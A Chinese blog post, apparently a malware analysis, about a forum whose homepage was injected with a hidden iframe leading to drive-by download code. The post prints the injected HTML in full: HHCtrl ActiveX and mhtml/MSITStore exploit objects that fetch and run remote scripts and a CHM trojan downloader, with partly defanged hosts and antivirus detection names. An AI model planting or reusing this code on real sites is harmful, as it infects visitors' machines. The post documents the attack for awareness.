一个被挂上木马的论坛

简介: 一个被挂上木马的论坛

坛首页被加入:

------------------
<iframe src="hxxp://msbyl***.***go1.icpcn.com/" width="0" height="0" frameborder="0"></iframe>
------------------

hxxp://msbyl***.***go1.icpcn.com/的代码为:

------------------
<SCRIPT language=VScript src="bbs003302.gif"></SCRIPT><SCRIPT language=VScript src="bbs003302.css"></SCRIPT><HTML><BODY><div style="display:none"><OBJECT id="cctv" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAM name="Command" value="Related Topics, MENU"><PARAM name="Window" value="$global_ifl"><PARAM name="Item1" value='command;file://C:/WINDOWS/Help/apps.chm'></OBJECT><OBJECT id="zgds" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAM name="Command" value="Related Topics, MENU"><PARAM name="Window" value="$global_ifl"><PARAM name="Item1" value='command;javascript:eval("document.write(/"<SCRIPT language=JScript src=///"hxxp://msbyl***.***go1.icpcn.com/bbs003302.gif///"/"+String.fromCharCode(62)+/"</SCR/"+/"IPT/"+String.fromCharCode(62))")'></OBJECT></div><SCRIPT>cctv.Click();setTimeout("zgds.Click();",0);</SCRIPT></BODY></HTML>
<html>
<iframe src="hxxp://msby***.go***1.icpcn.com/" width="0" height="0" frameborder="0"></iframe>
</html>
<script src='hxxp://s52.cnzz.com/stat.php?id=202256&web_id=202256&online=1&show=line' language='JavaScript' charset='gb2312'></script>
----------------
bbs003302.gif Kaspersky报为:exploit.VBS.Phel.m
bbs003302.css Kaspersky报为:Trojan-Downloader.Win32.Tiny.cj
hxxp://msby***.go***1.icpcn.com/的代码为:
----------------
<OBJECT Width=0 Height=0 style="display:none;" type="text/x-scriptlet" data="mk:@MSITStore:mhtml:c:/.mht!hxxp://msby***.go***1.icpcn.com/help.txt::/%23%2E%68%74m"></OBJECT>
<script src='hxxp://s53.cnzz.com/stat.php?id=204586&web_id=204586&online=1&show=line' language='JavaScript' charset='gb2312'></script>
----------------

help.txt 其实是一个CHM文件,Kaspersky报为:Trojan-Downloader.Win32.Tiny.cj。  


相关文章
|
3月前
|
安全 数据安全/隐私保护
一个被挂木马的政府网站
一个被挂木马的政府网站
|
3月前
|
安全
3个网站被挂上的木马出自一家
3个网站被挂上的木马出自一家
|
3月前
|
安全
又一个被挂木马的政府网站(第3版)
又一个被挂木马的政府网站(第3版)
|
安全 JavaScript
怎么防止网站不被挂木马篡改
因为说这些脚本文件它都是一些静态的文件连接,那么既然是静态的,那就是说我们存放这个脚本的这个服务器,它只能放静态文件,不支持任何的脚本语言,那它也就不可能存在任何的后门,也不可能被篡改挂木马,上传脚本后门文件等等这些问题,所以说只要替换成静态的连接文件,那么说你网站从此以后没人能修改这些静态的脚本文件,他如果想给网站挂木马的话,那只有其他的办法,那就是说给你网页插入一个新的脚本文件,那么他给你插一个新的脚本文件的话,我想普通的站长一眼就能看到,所以不需要到处去找,直接就可以把它移除掉,或者是我们可以配合一些网站的检测一些程序,检测你网站是否存在未知的文件,配合这样一些东西去方便快速的锁定,这个
276 0
怎么防止网站不被挂木马篡改
|
SQL 安全 JavaScript
15条实用的预防Dede织梦网站被挂马方法
15条实用的预防Dede织梦网站被挂马方法
148 0
|
安全
新闻周刊中文网遭黑客攻击 首页被挂马
新闻周刊中文网newsweekchinese.com是国内著名新闻站点,版面支持中、美、韩、日四种语言,在亚洲有一定影响力。近日遭黑客攻击,首页被挂马,目前还未修复。 图1 以下是所嵌入木马页面52-o.cn已被报告的警示。
912 0
|
安全
多家高校网站被挂马 用户应小心QQ盗号木马
据瑞星“云安全”系统统计,周末共有1123万人次的网民遭到网页挂马攻击,瑞星共截获了3,273,495个挂马网址,比上周同期有所上升。 当日被挂马网站Top5:   (注意:以下网址都带有病毒,请不要点击)     1、“北京大学公共卫生学院”:http://sph.bjmu.edu.cn/Html/downloads/index.htm,被嵌入的恶意网址为http://z.hg9*3.cn/d1/16/ytbf.htm等。
1298 0
|
云安全 安全
瑞星首推“恶意网站监测网” 每天500万网民访问挂马网站
1月8日,瑞星宣布推出“恶意网站监测网(http://mwm.rising.com.cn/)”,这是国内首个专门针对挂马网站、钓鱼网站等互联网威胁的实时监测系统,所有政府机构、企业和个人用户都可以免费浏览该网站,全面、清晰地了解国内网站被黑客“挂马”的情况。
1074 0
|
安全
警惕“搜房网”“凯业房园”等网站被挂马
据瑞星“云安全”系统统计, 上周末期间,共有5,556,431人次的网民遭到网页挂马攻击,瑞星共截获了748,911个挂马网址。 周末最流行木马病毒是 Worm.Win32.Autorun.gbn(U盘蠕虫下载器)“云安全”系统共收到100,754次用户上报。
1815 0